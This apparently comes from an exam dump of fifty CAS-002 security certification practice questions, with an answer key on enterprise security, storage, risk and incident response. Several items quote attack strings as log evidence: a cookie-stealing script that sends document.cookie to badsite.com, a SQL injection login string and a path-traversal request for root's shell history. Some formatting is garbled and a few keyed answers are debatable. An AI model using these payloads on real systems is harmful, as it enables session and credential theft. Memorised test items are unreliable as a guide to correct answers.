CAS-002 / Version 5.0

Question 1

An administrator wants to enable policy based flexible mandatory access controls on an open source OS to prevent abnormal application modifications or executions. Which of the following would BEST accomplish this?

A. Access control lists
B. SELinux
B. IPtables firewall
C. HIPS

Answer 1

Correct Answer: B

Section: Enterprise Security Explanation

Question 2

Company ABC’s SAN is nearing capacity, and will cause costly downtimes if servers run out disk space. Which of the following is a more cost effective alternative to buying a new SAN?

A. Enable multipath to increase availability
B. Enable deduplication on the storage pools
C. Implement snapshots to reduce virtual disk size
D. Implement replication to offsite datacenter

Answer 2

Correct Answer: B

Section: Enterprise Security Explanation

Question 3

A systems administrator establishes a CIFS share on a UNIX device to share data to Windows systems. The security authentication on the Windows domain is set to the highest level. Windows users are stating that they cannot authenticate to the UNIX share. Which of the following settings on the UNIX server would correct this problem

A. Refuse LM and only accept NTLMv2
B. Accept only LM
C. Refuse NTLMv2 and accept LM
D. Accept only NTLM

Answer 3

Correct Answer: A

Section: Enterprise Security Explanation

Question 4

A security architect is designing a new infrastructure using both type 1 and type 2 virtual machines. In addition to the normal complement of security controls (e.g. antivirus, host hardening, HIPS/NIDS) the security architect needs to implement a mechanism to securely store cryptographic keys used to sign code and code modules on the VMs. Which of the following will meet this goal without requiring any hardware pass-through implementations?

A. vTPM
B. HSM
C. TPM
D. INE

Answer 4

Correct Answer: A

Section: Enterprise Security Explanation

Question 5

A user has a laptop configured with multiple operating system installations. The operating systems are all installed on a single SSD, but each has its own partition and logical volume. Which of the following is the BEST way to ensure confidentiality of individual operating system data?

A. Encryption of each individual partition
B. Encryption of the SSD at the file level
C. FDE of each logical volume on the SSD
D. FDE of the entire SSD as a single disk

Answer 5

Correct Answer: A

Section: Enterprise Security Explanation

Question 6

After being notified of an issue with the online shopping cart, where customers are able to arbitrarily change the price of listed items, a programmer analyzes the following piece of code used by a web based shopping cart.

SELECT ITEM FROM CART WHERE ITEM=ADDSLASHES($USERINPUT);

The programmer found that every time a user adds an item to the cart, a temporary file is created on the web server /tmp directory. The temporary file has a name which is generated by concatenating the content of the $USERINPUT variable and a timestamp in the form of MM-DD-YYYY, (e.g. smartphone-12-25- 2013.tmp) containing the price of the item being purchased. Which of the following is MOST likely being exploited to manipulate the price of a shopping cart’s items?

A. Input validation
B. SQL injection
C. TOCTOU
D. Session hijacking

Answer 6

Correct Answer: C

Section: Enterprise Security Explanation

Question 7

The administrator is troubleshooting availability issues on an FCoE-based storage array that uses deduplication. The single controller in the storage array has failed, so the administrator wants to move the drives to a storage array from a different manufacturer in order to access the data. Which of the following
issues may potentially occur?

A. The data may not be in a usable format.
B. The new storage array is not FCoE based.
C. The data may need a file system check.
D. The new storage array also only has a single controller.

Answer 7

Correct Answer: A

Section: Enterprise Security Explanation

Question 8

Joe, a hacker, has discovered he can specifically craft a webpage that when viewed in a browser crashes the browser and then allows him to gain remote code execution in the context of the victim’s privilege level. The browser crashes due to an exception error when a heap memory that is unused is accessed.
Which of the following BEST describes the application issue?

A. Integer overflow
B. Click-jacking
C. Race condition
D.  SQL injection
E. Use after free
F. Input validation

Answer 8

Correct Answer: E

Section: Enterprise Security Explanation

Question 9

A developer is determining the best way to improve security within the code being developed. The developer is focusing on input fields where customers enter their credit card details. Which of the following techniques, if implemented in the code, would be the MOST effective in protecting the fields from malformed input?

A. Client side input validation
B. Stored procedure
C. Encrypting credit card details
D. Regular expression matching

Answer 9

Correct Answer: D

Section: Enterprise Security Explanation

Question 10

A security administrator was doing a packet capture and noticed a system communicating with an unauthorized address within the 2001::/32 prefix. The network administrator confirms there is no IPv6 routing into or out of the network. Which of the following is the BEST course of action?

A. Investigate the network traffic and block UDP port 3544 at the firewall
B. Remove the system from the network and disable IPv6 at the router
C. Locate and remove the unauthorized 6to4 relay from the network
D. Disable the switch port and block the 2001::/32 traffic at the firewall

Answer 10

Correct Answer: A

Section: Enterprise Security Explanation

Question 11

A security administrator notices the following line in a server’s security log:
document.location=’http://badsite.com/?q=’document.cookie’) + “’;
The administrator is concerned that it will take the developer a lot of time to fix the application that is running on the server. Which of the following should the security administrator implement to prevent this particular attack?

A. WAF
B. Input validation
C. SIEM
D. Sandboxing
E. DAM

Answer 11

Correct Answer: A

Section: Enterprise Security Explanation

Question 12

A popular commercial virtualization platform allows for the creation of virtual hardware. To virtual machines, this virtual hardware is indistinguishable from real hardware. By implementing virtualized TPMs, which of the following trusted system concepts can be implemented?

A. Software-based root of trust
B. Continuous chain of trust
C. Chain of trust with a hardware root of trust
D. Software-based trust anchor with no root of trust

Answer 12

Correct Answer: C

Section: Enterprise Security Explanation

Question 13

An organization is concerned with potential data loss in the event of a disaster, and created a backup datacenter as a mitigation strategy. The current storage method is a single NAS used by all servers in both datacenters. Which of the following options increases data availability in the event of a datacenter failure?

A. Replicate NAS changes to the tape backups at the other datacenter.
B. Ensure each server has two HBAs connected through two routes to the NAS.
C. Establish deduplication across diverse storage paths.
D. Establish a SAN that replicates between datacenters.

Answer 13

Correct Answer: D

Section: Enterprise Security Explanation

Question 14

An application present on the majority of an organization’s 1,000 systems is vulnerable to a buffer overflow attack. Which of the following is the MOST comprehensive way to resolve the issue?

A. Deploy custom HIPS signatures to detect and block the attacks.
B. Validate and deploy the appropriate patch.
C. Run the application in terminal services to reduce the threat landscape.
D. Deploy custom NIPS signatures to detect and block the attacks.

Answer 14

Correct Answer: B

Section: Enterprise Security Explanation

Question 15

select id, firstname, lastname from authors User input= firstname= Hack;man
lastname=Johnson

Which of the following types of attacks is the user attempting?

A. XML injection
B. Command injection
C. Cross-site scripting
D. SQL injection

Answer 15

Correct Answer: D

Section: Enterprise Security Explanation

Question 16

A government agency considers confidentiality to be of utmost importance and availability issues to be of least importance. Knowing this, which of the following correctly orders various vulnerabilities in the order of MOST important to LEAST important?

A. Insecure direct object references, CSRF, Smurf
B. Privilege escalation, Application DoS, Buffer overflow
C. SQL injection, Resource exhaustion, Privilege escalation
D. CSRF, Fault injection, Memory leaks

Answer 16

Correct Answer: A

Section: Enterprise Security Explanation

Question 17

QUESTION 17
A security administrator wants to deploy a dedicated storage solution which is inexpensive, can natively integrate with AD, allows files to be selectively encrypted and is suitable for a small number of users at a satellite office. Which of the following would BEST meet the requirement?

A. SAN
B. NAS
C. Virtual SAN
D. Virtual storage

Answer 17

Correct Answer: B

Section: Enterprise Security Explanation

Question 18

At 9:00 am each morning, all of the virtual desktops in a VDI implementation become extremely slow and/ or unresponsive. The outage lasts for around 10 minutes, after which everything runs properly again. The administrator has traced the problem to a lab of thin clients that are all booted at 9:00 am each morning. Which of the following is the MOST likely cause of the problem and the BEST solution? (Select TWO).

A. Add guests with more memory to increase capacity of the infrastructure.
B. A backup is running on the thin clients at 9am every morning.
C. Install more memory in the thin clients to handle the increased load while booting.
D. Booting all the lab desktops at the same time is creating excessive I/O.
E. Install 10-Gb uplinks between the hosts and the lab to increase network capacity.
F. Install faster SSD drives in the storage system used in the infrastructure.
G. The lab desktops are saturating the network while booting.
H. The lab desktops are using more memory than is available to the host systems.

Answer 18

Correct Answer: DF

Section: Enterprise Security Explanation

Question 19

A security administrator is shown the following log excerpt from a Unix system:

2013 Oct 10 07:14:57 web14 sshd[1632]: Failed password for root from 198.51.100.23 port 37914 ssh2
2013 Oct 10 07:14:57 web14 sshd[1635]: Failed password for root from 198.51.100.23 port 37915 ssh2
2013 Oct 10 07:14:58 web14 sshd[1638]: Failed password for root from 198.51.100.23 port 37916 ssh2
2013 Oct 10 07:15:59 web14 sshd[1640]: Failed password for root from 198.51.100.23 port 37918 ssh2
2013 Oct 10 07:16:00 web14 sshd[1641]: Failed password for root from 198.51.100.23 port 37920 ssh2
2013 Oct 10 07:16:00 web14 sshd[1642]: Successful login for root from 198.51.100.23 port 37924 ssh2

Which of the following is the MOST likely explanation of what is occurring and the BEST immediate response? (Select TWO).

A. An authorized administrator has logged into the root account remotely.

B. The administrator should disable remote root logins.

C. Isolate the system immediately and begin forensic analysis on the host.

D. A remote attacker has compromised the root account using a buffer overflow in sshd.

E. A remote attacker has guessed the root password using a dictionary attack.

F. Use iptables to immediately DROP connections from the IP 198.51.100.23.

G. A remote attacker has compromised the private key of the root account.

H. Change the root password immediately to a password not found in a dictionary.

Answer 19

Correct Answer: CE

Section: Enterprise Security Explanation

Question 20

A security administrator wants to prevent sensitive data residing on corporate laptops and desktops from leaking outside of the corporate network. The company has already implemented full-disk encryption and has disabled all peripheral devices on its desktops and laptops. Which of the following additional controls MUST be implemented to minimize the risk of data leakage? (Select TWO).

A. A full-system backup should be implemented to a third-party provider with strong encryption for data in transit.

B. A DLP gateway should be installed at the company border.

C. Strong authentication should be implemented via external biometric devices.

D. Full-tunnel VPN should be required for all network communication.

E. Full-drive file hashing should be implemented with hashes stored on separate storage.

F. Split-tunnel VPN should be enforced when transferring sensitive data.

Answer 20

Correct Answer: BD

Section: Enterprise Security Explanation

Question 21

A developer has implemented a piece of client-side JavaScript code to sanitize a user’s provided input to a web page login screen. The code ensures that only the upper case and lower case letters are entered in the username field, and that only a 6-digit PIN is entered in the password field. A security administrator is concerned with the following web server log:
10.235.62.11 – - [02/Mar/2014:06:13:04] “GET /site/script.php?user=admin&pass=pass%20or%201=1 HTTP/1.1” 200 5724

Given this log, which of the following is the security administrator concerned with and which fix should be implemented by the developer?

A. The security administrator is concerned with nonprintable characters being used to gain administrative access, and the developer should strip all nonprintable characters.

B. The security administrator is concerned with XSS, and the developer should normalize Unicode characters on the browser side.

C. The security administrator is concerned with SQL injection, and the developer should implement server side input validation.

D. The security administrator is concerned that someone may log on as the administrator, and the developer should ensure strong passwords are enforced.

Answer 21

Correct Answer: C

Section: Enterprise Security Explanation

Question 22

The security administrator finds unauthorized tables and records, which were not present before, on a Linux database server. The database server communicates only with one web server, which connects to the database server via an account with SELECT only privileges. Web server logs show the following:

90.76.165.40 – - [08/Mar/2014:10:54:04] “GET calendar.php?create%20table%20hidden HTTP/1.1” 200 5724
90.76.165.40 – - [08/Mar/2014:10:54:05] “GET ../../../root/.bash_history HTTP/1.1” 200 5724 90.76.165.40 – - [08/Mar/2014:10:54:04] “GET index.php?user=Create HTTP/1.1” 200 5724
The security administrator also inspects the following file system locations on the database server using the command ‘ls -al /root’
drwxrwxrwx 11 root root 4096 Sep 28 22:45 .
drwxr-xr-x 25 root root 4096 Mar 8 09:30 ..
-rws—— 25 root root 4096 Mar 8 09:30 .bash_history
-rw——- 25 root root 4096 Mar 8 09:30 .bash_history
-rw——- 25 root root 4096 Mar 8 09:30 .profile
-rw——- 25 root root 4096 Mar 8 09:30 .ssh

Which of the following attacks was used to compromise the database server and what can the security administrator implement to detect such attacks in the future? (Select TWO).

A. Privilege escalation
B. Brute force attack
C. SQL injection
D. Cross-site scripting
E. Using input validation, ensure the following characters are sanitized: <>
F. Update crontab with: find / ( -perm -4000 ) –type f –print0 | xargs -0 ls –l | email.sh
G. Implement the following PHP directive: $clean_user_input = addslashes($user_input)
H. Set an account lockout policy

Answer 22

Correct Answer: AF

Section: Enterprise Security Explanation

Question 23

The risk manager has requested a security solution that is centrally managed, can easily be updated, and protects end users’ workstations from both known and unknown malicious attacks when connected to either the office or home network. Which of the following would BEST meet this requirement?

A. HIPS
B. UTM
C. Antivirus
D. NIPS
E. DLP

Answer 23

Correct Answer: A

Section: Enterprise Security Explanation

Question 24

Which of the following describes a risk and mitigation associated with cloud data storage?

A. Risk: Shared hardware caused data leakage Mitigation: Strong encryption at rest

B. Risk: Offsite replication Mitigation: Multi-site backups

C. Risk: Data loss from de-duplication Mitigation: Dynamic host bus addressing

D. Risk: Combined data archiving

Mitigation: Two-factor administrator authentication

Answer 24

Correct Answer: A

Section: Enterprise Security Explanation

Question 25

An insurance company is looking to purchase a smaller company in another country. Which of the following tasks would the security administrator perform as part of the security due diligence?

A. Review switch and router configurations
B. Review the security policies and standards
C. Perform a network penetration test
D. Review the firewall rule set and IPS logs

Answer 25

Correct Answer: B

Section: Risk Management and Incident Response Explanation

Question 26

A new piece of ransomware got installed on a company’s backup server which encrypted the hard drives containing the OS and backup application configuration but did not affect the deduplication data hard drives. During the incident response, the company finds that all backup tapes for this server are also corrupt. Which of the following is the PRIMARY concern?

A. Determining how to install HIPS across all server platforms to prevent future incidents

B. Preventing the ransomware from re-infecting the server upon restore

C. Validating the integrity of the deduplicated data

D. Restoring the data will be difficult without the application configuration

Answer 26

Correct Answer: D

Section: Risk Management and Incident Response Explanation

Question 27

The Chief Executive Officer (CEO) of a large prestigious enterprise has decided to reduce business costs by outsourcing to a third party company in another country. Functions to be outsourced include: business analysts, testing, software development and back office functions that deal with the processing of customer data. The Chief Risk Officer (CRO) is concerned about the outsourcing plans. Which of the following risks are MOST likely to occur if adequate controls are not implemented?

A. Geographical regulation issues, loss of intellectual property and interoperability agreement issues

B. Improper handling of client data, interoperability agreement issues and regulatory issues

C. Cultural differences, increased cost of doing business and divestiture issues

D. Improper handling of customer data, loss of intellectual property and reputation damage

Answer 27

Correct Answer: D

Section: Risk Management and Incident Response Explanation

Question 28

A security analyst has been asked to develop a quantitative risk analysis and risk assessment for the company’s online shopping application. Based on heuristic information from the Security Operations Center (SOC), a Denial of Service Attack (DoS) has been successfully executed 5 times a year. The Business Operations department has determined the loss associated to each attack is $40,000. After implementing application caching, the number of DoS attacks was reduced to one time a year. The cost of the countermeasures was $100,000. Which of the following is the monetary value earned during the first year of operation?

A.
$60,000
B.
$100,000
C.
$140,000
D.
$200,000

Answer 28

Correct Answer: A

Section: Risk Management and Incident Response Explanation

Question 29

The Information Security Officer (ISO) is reviewing new policies that have been recently made effective and now apply to the company. Upon review, the ISO identifies a new requirement to implement two- factor authentication on the company’s wireless system. Due to budget constraints, the company will be unable to implement the requirement for the next two years. The ISO is required to submit a policy exception form to the Chief Information Officer (CIO). Which of the following are MOST important to include when submitting the exception form? (Select THREE).

A. Business or technical justification for not implementing the requirements.

B. Risks associated with the inability to implement the requirements.

C. Industry best practices with respect to the technical implementation of the current controls.

D. All sections of the policy that may justify non-implementation of the requirements.

E. A revised DRP and COOP plan to the exception form.

F. Internal procedures that may justify a budget submission to implement the new requirement.

G. Current and planned controls to mitigate the risks.

Answer 29

Correct Answer: ABG

Section: Risk Management and Incident Response Explanation

Question 30

The Chief Information Officer (CIO) is reviewing the IT centric BIA and RA documentation. The documentation shows that a single 24 hours downtime in a critical business function will cost the business
$2.3 million. Additionally, the business unit which depends on the critical business function has determined that there is a high probability that a threat will materialize based on historical data. The CIO’s budget does
not allow for full system hardware replacement in case of a catastrophic failure, nor does it allow for the purchase of additional compensating controls. Which of the following should the CIO recommend to the finance director to minimize financial loss?

A. The company should mitigate the risk.
B. The company should transfer the risk.
C. The company should avoid the risk.
D. The company should accept the risk.

Answer 30

Correct Answer: B

Section: Risk Management and Incident Response Explanation

Question 31

A company is in the process of outsourcing its customer relationship management system to a cloud provider. It will host the entire organization’s customer database. The database will be accessed by both the company’s users and its customers. The procurement department has asked what security activities must be performed for the deal to proceed. Which of the following are the MOST appropriate security activities to be performed as part of due diligence? (Select TWO).

A. Physical penetration test of the datacenter to ensure there are appropriate controls.

B. Penetration testing of the solution to ensure that the customer data is well protected.

C. Security clauses are implemented into the contract such as the right to audit.

D. Review of the organizations security policies, procedures and relevant hosting certifications.

E. Code review of the solution to ensure that there are no back doors located in the software.

Answer 31

Correct Answer: CD

Section: Risk Management and Incident Response Explanation

Question 32

An organization is selecting a SaaS provider to replace its legacy, in house Customer Resource Management (CRM) application. Which of the following ensures the organization mitigates the risk of managing separate user credentials?

A. Ensure the SaaS provider supports dual factor authentication.

B. Ensure the SaaS provider supports encrypted password transmission and storage.

C. Ensure the SaaS provider supports secure hash file exchange.

D. Ensure the SaaS provider supports role-based access control.

E. Ensure the SaaS provider supports directory services federation.

Answer 32

Correct Answer: E

Section: Risk Management and Incident Response Explanation

Question 33

After a security incident, an administrator would like to implement policies that would help reduce fraud and the potential for collusion between employees. Which of the following would help meet these goals by having co-workers occasionally audit another worker’s position?

A. Least privilege
B. Job rotation
C. Mandatory vacation
D. Separation of duties

Answer 33

Correct Answer: B

Section: Risk Management and Incident Response Explanation

Question 34

A large organization has recently suffered a massive credit card breach. During the months of Incident Response, there were multiple attempts to assign blame for whose fault it was that the incident occurred. In which part of the incident response phase would this be addressed in a controlled and productive manner?

A. During the Identification Phase
B. During the Lessons Learned phase
C. During the Containment Phase
D. During the Preparation Phase

Answer 34

Correct Answer: B

Section: Risk Management and Incident Response Explanation

Question 35

A security manager for a service provider has approved two vendors for connections to the service provider backbone. One vendor will be providing authentication services for its payment card service, and the other vendor will be providing maintenance to the service provider infrastructure sites. Which of the following business agreements is MOST relevant to the vendors and service provider’s relationship?

A. Memorandum of Agreement
B. Interconnection Security Agreement
C. Non-Disclosure Agreement
D. Operating Level Agreement

Answer 35

Correct Answer: B

Section: Risk Management and Incident Response Explanation

Question 36

A large enterprise acquires another company which uses antivirus from a different vendor. The CISO has requested that data feeds from the two different antivirus platforms be combined in a way that allows management to assess and rate the overall effectiveness of antivirus across the entire organization.
Which of the following tools can BEST meet the CISO’s requirement?

A. GRC
B. IPS
C. CMDB
D. Syslog-ng
E. IDS

Answer 36

Correct Answer: A

Section: Risk Management and Incident Response Explanation

Question 37

Which of the following provides the BEST risk calculation methodology?

A. Annual Loss Expectancy (ALE) x Value of Asset

B. Potential Loss x Event Probability x Control Failure Probability

C. Impact x Threat x Vulnerability

D. Risk Likelihood x Annual Loss Expectancy (ALE)

Answer 37

Correct Answer: B

Section: Risk Management and Incident Response Explanation

Question 38

A security policy states that all applications on the network must have a password length of eight characters. There are three legacy applications on the network that cannot meet this policy. One system will be upgraded in six months, and two are not expected to be upgraded or removed from the network. Which of the following processes should be followed?

A. Establish a risk matrix
B. Inherit the risk for six months
C. Provide a business justification to avoid the risk
D. Provide a business justification for a risk exception

Answer 38

Correct Answer: D

Section: Risk Management and Incident Response Explanation

Question 39

The senior security administrator wants to redesign the company DMZ to minimize the risks associated with both external and internal threats. The DMZ design must support security in depth, change management and configuration processes, and support incident reconstruction. Which of the following designs BEST supports the given requirements?

A. A dual firewall DMZ with remote logging where each firewall is managed by a separate administrator.

B. A single firewall DMZ where each firewall interface is managed by a separate administrator and logging to the cloud.

C. A SaaS based firewall which logs to the company’s local storage via SSL, and is managed by the change control team.

D. A virtualized firewall, where each virtual instance is managed by a separate administrator and logging to the same hardware.

Answer 39

Correct Answer: A

Section: Risk Management and Incident Response Explanation
Explanation/Reference:

Question 40

A large hospital has implemented BYOD to allow doctors and specialists the ability to access patient medical records on their tablets. The doctors and specialists access patient records over the hospital’s guest WiFi network which is isolated from the internal network with appropriate security controls. The patient records management system can be accessed from the guest network and requires two factor authentication. Using a remote desktop type interface, the doctors and specialists can interact with the hospital’s system. Cut and paste and printing functions are disabled to prevent the copying of data to BYOD devices. Which of the following are of MOST concern? (Select TWO).

A. Privacy could be compromised as patient records can be viewed in uncontrolled areas.

B. Device encryption has not been enabled and will result in a greater likelihood of data loss.

C. The guest WiFi may be exploited allowing non-authorized individuals access to confidential patient data.

D. Malware may be on BYOD devices which can extract data via key logging and screen scrapes.

E. Remote wiping of devices should be enabled to ensure any lost device is rendered inoperable.

Answer 40

Correct Answer: AD

Section: Risk Management and Incident Response Explanation

Question 41

The Chief Information Security Officer (CISO) at a company knows that many users store business documents on public cloud-based storage, and realizes this is a risk to the company. In response, the CISO implements a mandatory training course in which all employees are instructed on the proper use of cloud-based storage. Which of the following risk strategies did the CISO implement?

A. Avoid
B. Accept
C. Mitigate
D. Transfer

Answer 41

Correct Answer: C

Section: Risk Management and Incident Response Explanation

Question 42

A forensic analyst receives a hard drive containing malware quarantined by the antivirus application. After creating an image and determining the directory location of the malware file, which of the following helps to determine when the system became infected?

A. The malware file’s modify, access, change time properties.
B. The timeline analysis of the file system.
C. The time stamp of the malware in the swap file.
D. The date/time stamp of the malware detection in the antivirus logs.

Answer 42

Correct Answer: B

Section: Risk Management and Incident Response Explanation
Explanation/Reference:

Question 43

The Chief Executive Officer (CEO) of a company that allows telecommuting has challenged the Chief Security Officer’s (CSO) request to harden the corporate network’s perimeter. The CEO argues that the company cannot protect its employees at home, so the risk at work is no different. Which of the following BEST explains why this company should proceed with protecting its corporate network boundary?

A. The corporate network is the only network that is audited by regulators and customers.

B. The aggregation of employees on a corporate network makes it a more valuable target for attackers.

C. Home networks are unknown to attackers and less likely to be targeted directly.

D. Employees are more likely to be using personal computers for general web browsing when they are at home.

Answer 43

Correct Answer: B

Section: Risk Management and Incident Response Explanation

Question 44

A security officer is leading a lessons learned meeting. Which of the following should be components of that meeting? (Select TWO).

A. Demonstration of IPS system
B. Review vendor selection process
C. Calculate the ALE for the event
D. Discussion of event timeline
E. Assigning of follow up items

Answer 44

Correct Answer: DE

Section: Risk Management and Incident Response Explanation

Question 45

An assessor identifies automated methods for identifying security control compliance through validating sensors at the endpoint and at Tier 2. Which of the following practices satisfy continuous monitoring of authorized information systems?

A. Independent verification and validation
B. Security test and evaluation
C. Risk assessment
D. Ongoing authorization

Answer 45

Correct Answer: D

Section: Risk Management and Incident Response Explanation

Question 46

The source workstation image for new accounting PCs has begun blue-screening. A technician notices that the date/time stamp of the image source appears to have changed. The desktop support director has
asked the Information Security department to determine if any changes were made to the source image. Which of the following methods would BEST help with this process? (Select TWO).

A. Retrieve source system image from backup and run file comparison analysis on the two images.

B. Parse all images to determine if extra data is hidden using steganography.

C. Calculate a new hash and compare it with the previously captured image hash.

D. Ask desktop support if any changes to the images were made.

E. Check key system files to see if date/time stamp is in the past six months.

Answer 46

Correct Answer: AC

Section: Risk Management and Incident Response Explanation

Question 47

A software project manager has been provided with a requirement from the customer to place limits on the types of transactions a given user can initiate without external interaction from another user with elevated privileges. This requirement is BEST described as an implementation of:

A. an administrative control
B. dual control
C. separation of duties
D. least privilege
E. collusion

Answer 47

Correct Answer: C

Section: Risk Management and Incident Response Explanation

Question 48

The technology steering committee is struggling with increased requirements stemming from an increase
in telecommuting. The organization has not addressed telecommuting in the past. The implementation of a new SSL-VPN and a VOIP phone solution enables personnel to work from remote locations with corporate assets. Which of the following steps must the committee take FIRST to outline senior management’s directives?

A. Develop an information classification scheme that will properly secure data on corporate systems.

B. Implement database views and constrained interfaces so remote users will be unable to access PII from personal equipment.

C. Publish a policy that addresses the security requirements for working remotely with company equipment.

D. Work with mid-level managers to identify and document the proper procedures for telecommuting.

Answer 48

Correct Answer: C

Section: Risk Management and Incident Response Explanation

Question 49

A company is facing penalties for failing to effectively comply with e-discovery requests. Which of the following could reduce the overall risk to the company from this issue?

A. Establish a policy that only allows filesystem encryption and disallows the use of individual file encryption.

B. Require each user to log passwords used for file encryption to a decentralized repository.

C. Permit users to only encrypt individual files using their domain password and archive all old user passwords.

D. Allow encryption only by tools that use public keys from the existing escrowed corporate PKI.

Answer 49

Correct Answer: D

Section: Risk Management and Incident Response Explanation

Question 50

There have been some failures of the company’s internal facing website. A security engineer has found the WAF to be the root cause of the failures. System logs show that the WAF has been unavailable for 14 hours over the past month, in four separate situations. One of these situations was a two hour scheduled maintenance time, aimed at improving the stability of the WAF. Using the MTTR based on the last month’s performance figures, which of the following calculations is the percentage of uptime assuming there were 722 hours in the month?

A. 92.24 percent
B. 98.06 percent
C. 98.34 percent
D. 99.72 percent

Answer 50

Correct Answer: C

Section: Research and Analysis Explanation